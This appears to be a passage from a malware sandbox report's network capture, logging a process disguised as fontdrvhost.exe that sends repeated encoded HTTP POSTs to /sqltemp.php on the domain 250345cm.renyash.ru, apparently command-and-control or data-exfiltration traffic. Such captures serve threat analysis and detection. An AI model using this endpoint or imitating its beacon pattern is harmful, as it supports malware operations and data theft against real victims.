Jan 1, 2025 14:52:30.564135075 CET	814	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NE%2Fca4TwwbuGlifu6x3akrp4g01%2B4oRj2Pg3MDmPZbAnoksiFYgrq%2FubuXusl39wFLFX%2FWhwpwoEq2dfgg2wWM0%2Fi0w7giUqIqAR%2FB0F4qT7LsE7g%2FoQHJoWdepsetPZx%2B7Z3S9f"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd7d0d150f3a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4761&min_rtt=1641&rtt_var=6855&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=54883&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49779	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:30.691910028 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:31.042700052 CET	1012	OUT	Data Raw: 53 55 5f 57 54 5f 54 54 58 56 52 59 56 51 59 51 5b 5a 54 5b 55 59 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SU_WT_TTXVRYVQYQ[ZT[UYPYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'?7/'>'C.1R4$_(V).<[7?]<]9D%Y<:&Y.,Y-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49780	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:31.102561951 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:31.448810101 CET	1852	OUT	Data Raw: 53 55 5a 56 54 59 54 52 58 56 52 59 56 50 59 5e 5b 53 54 51 55 5b 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SUZVTYTRXVRYVPY^[STQU[P^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z0?-7.0-<,=R =$X*)). 2(9B&;W9:&Y.,Y-
Jan 1, 2025 14:52:31.560277939 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:31.836441994 CET	951	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfKsTcfxtrILjrE3xNBhVHM0VyFV6jDYdhtAkwSDCaF1G08RmMXXyynnQB3bndv4R6JIc8sRmias2cmoHeQPGF9lRgDJYxqiyua%2BP%2BcsbfnxSptzG1DDlQi21wm2KTQlEJTmLVuA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd84fb180ca0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4766&min_rtt=1663&rtt_var=6831&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=55106&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 25 55 3d 3e 32 1e 26 22 2b 03 3f 04 2f 55 26 3e 31 05 3c 3b 36 5d 24 2e 27 59 3d 2a 37 11 22 2c 31 12 32 16 0a 1d 20 3d 33 11 33 0e 2b 59 05 1c 23 1a 36 3c 2f 00 3e 3e 24 00 25 3c 21 58 26 3e 23 07 2a 28 24 53 37 38 20 07 27 03 24 1e 2a 2a 2c 1e 27 2c 24 07 2f 2f 2a 0b 26 2a 2c 54 00 11 26 54 24 08 24 5e 34 37 2b 01 22 57 3e 03 32 1a 2a 15 24 3c 2f 54 23 2a 3a 5e 31 1c 0e 01 36 0a 3d 07 32 2b 26 03 20 3d 0d 51 3d 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%U=>2&"+?/U&>1<;6]$.'Y=7",12 =33+Y#6</>>$%<!X&>#($S78 '$*,',$//&,T&T$$^47+"W>2$</T#*:^16=2+& =Q=.%S -H?WS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49781	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:31.259345055 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:31.605093956 CET	1008	OUT	Data Raw: 56 56 5f 5d 54 5b 54 5d 58 56 52 59 56 59 59 56 5b 5a 54 50 55 58 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VV_]T[T]XVRYVYYV[ZTPUXP_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.[&,4-'=(;)1!='?90,]723\+;!1.:&Y.,Y-%
Jan 1, 2025 14:52:31.722676039 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:31.985232115 CET	812	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yI7G0COESeYoXJ%2F8lbcSj3PVrqsHjIN%2FiHHxG1OX6%2Bsle01frUh2lc%2BaAEr6moOnZZomYU13%2FOrhjcCftxSs%2FQqni4zBv1w9Yzox9t6evHx7U25s9rikUMDisD5u7%2FAOJ4IVahFm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd85fc8d4343-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4058&min_rtt=1713&rtt_var=5334&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1327&delivery_rate=71289&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49782	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:32.103571892 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:32.451190948 CET	1012	OUT	Data Raw: 56 54 5f 53 54 50 51 50 58 56 52 59 56 5d 59 57 5b 53 54 5f 55 55 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VT_STPQPXVRYV]YW[ST_UUP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.^'?9Z#/20>(8%R .8<:<*. T/Y+;%#V9&Y.,Y-1
Jan 1, 2025 14:52:32.578933001 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:32.843348980 CET	800	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ev9O4HeEj5hXWUIcTHwwNBRkUajlAIz31ExBaYPaApwNEStFMJ7Z0mckSbvb6DQryKNeqmDmfyDfnEnwIBxcnkIbUQ2Se1bNBGgevx7SQjxB8PLiitUVQewdTbU6Bva1XWF4u%2FEy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd8b5b6f5e5f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4361&min_rtt=1623&rtt_var=6084&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=62056&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49783	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:32.963529110 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:33.308507919 CET	1012	OUT	Data Raw: 53 54 5f 56 51 58 51 56 58 56 52 59 56 5e 59 5e 5b 5e 54 5d 55 5c 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: ST_VQXQVXVRYV^Y^[^T]U\PUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._0<& ';E8 .8[(93V)= 73X(]&1::&Y.,Y-
Jan 1, 2025 14:52:33.426918983 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:33.682763100 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ve3nUdu2iW9IALpxbb11p6HXsyfJP9VwhExP5%2F55V0WD%2BiSQ%2BdkoLn5qbeV5BsTli%2Bs83Yo9E4sXdrg31RtYoKZdyaxzSHGxWjbZcm5Vs%2Fe%2FJgMebuKq4wZGOygUMI7ZDqQLL5P"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd909fa41906-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7617&min_rtt=1474&rtt_var=12838&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=28843&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a Data Ascii: 42W\X
Jan 1, 2025 14:52:33.773332119 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49784	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:33.929259062 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:34.276952028 CET	1012	OUT	Data Raw: 53 57 5f 54 54 58 54 56 58 56 52 59 56 5c 59 54 5b 5a 54 5c 55 5e 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SW_TTXTVXVRYV\YT[ZT\U^PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._&/: ?=0+8&#<Y+7W>'#(+:$/U-*&Y.,Y-5
Jan 1, 2025 14:52:34.376506090 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:34.644387007 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QUK0DJ7HMeQ%2B9hftAJZrBEqsygX%2FnWXI53nU16FWuKqM8WROAS7oms9mRfddnCejK59Pf6qmwoi%2BjsibdkHN5dFaXdUDeo2YIidktPWdPpABrOXchem7P0%2BFlnWNzCDfHpdhSy05"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd969dbfde97-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3748&min_rtt=1479&rtt_var=5094&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=74349&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49785	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:34.775681019 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:35.120800018 CET	1008	OUT	Data Raw: 56 5f 5f 55 54 5f 54 55 58 56 52 59 56 59 59 52 5b 5e 54 59 55 58 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V__UT_TUXVRYVYYR[^TYUXP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z$" 3;;!V!=/<'X?#1?(5C%<'W.&Y.,Y-5
Jan 1, 2025 14:52:35.240478992 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:35.421550989 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BNOK6cJBZkJM4YyR7vsw0HgTZ30zEQFghpyBhzrw%2BPsF%2Bs1DlNvjJl4J1MAnpZV7Nao8Kx5Bb8afvoMZrMOoap1XtrCJKKiPF8BJAbuTYEwZIf3KRel1kfWKTplbuYzxhyG%2BNAU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd9bfb8d42d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3899&min_rtt=1749&rtt_var=4957&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1327&delivery_rate=77020&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49786	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:35.542504072 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:35.902036905 CET	1012	OUT	Data Raw: 56 55 5f 56 51 58 54 55 58 56 52 59 56 5a 59 51 5b 5f 54 5a 55 5d 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VU_VQXTUXVRYVZYQ[_TZU]P\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'#3X;A,9!U .,?$-#42+.$,4::&Y.,Y--
Jan 1, 2025 14:52:35.991522074 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:36.259244919 CET	807	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MlNhQp5GyJHfcqXE5ha%2FwwurflNitlRg64MMW4U0dsceou8%2FN%2BGWiq0Tth4hX64K8p76SzmVEoa3Ku7ptVUEqW0uWBmH%2FgGAWB8PY3U0r25g6qJP8fTmUhx80ki8Uph8DItfehpI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fda0abe94408-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2573&min_rtt=2128&rtt_var=1689&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=256365&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49787	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:36.387100935 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:36.745752096 CET	1012	OUT	Data Raw: 56 5f 5a 57 54 59 51 52 58 56 52 59 56 5c 59 5e 5b 5a 54 5f 55 5e 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V_ZWTYQRXVRYV\Y^[ZT_U^PUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-0Y=X#$B/\> =$X(_;S*- X4,(5E&/ .&Y.,Y-5
Jan 1, 2025 14:52:36.831913948 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49788	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:36.845633030 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:37.198889971 CET	1852	OUT	Data Raw: 56 56 5f 54 51 5f 54 56 58 56 52 59 56 5e 59 50 5b 53 54 5f 55 58 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VV_TQ_TVXVRYV^YP[ST_UXP_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$?5X4<&'=(,\9R4=<_7)X47+]61<?-&Y.,Y-
Jan 1, 2025 14:52:37.313612938 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:37.651196003 CET	959	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g70hzTlciYVNm09TXtyp4lGKaBLrceWPDkz0OOIGCrhNXBLwvM%2BPmgZKMiyDUkYy%2BZ2Ba35tHTRRWG6ET%2Flqbz3zV87fOQSwuCIJkVAtd3D2%2BndznaU3tKcknJn%2FF6Yt8%2BkVl3BY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fda8eda80f4f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4855&min_rtt=1721&rtt_var=6914&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=54483&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 26 0e 3e 3d 29 09 25 1c 24 5a 2a 2d 23 54 31 3e 0b 01 3c 3b 29 01 27 2e 0e 03 29 07 05 58 21 5a 36 03 31 38 28 5b 21 2d 3b 5b 33 0e 2b 59 05 1c 23 1c 22 2f 3c 5f 29 3d 05 58 32 3f 3d 59 24 2e 28 1b 3c 38 37 0d 20 28 3b 1d 24 3d 1a 5a 29 5c 2f 0b 26 2f 23 5f 2d 3c 29 55 33 2a 2c 54 00 11 25 0d 30 0f 38 5c 20 27 20 10 20 21 3a 02 31 1a 29 08 26 3c 20 0c 34 07 00 1b 26 21 2f 1d 22 0a 3a 5b 31 15 29 11 20 5b 37 55 3d 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&>=)%$Z-#T1><;)'.)X!Z618([!-;[3+Y#"/<_)=X2?=Y$.(<87 (;$=Z)\/&/#_-<)U3,T%08\ ' !:1)&< 4&!/":[1) [7U=%S -H?WS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49789	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:36.962460041 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
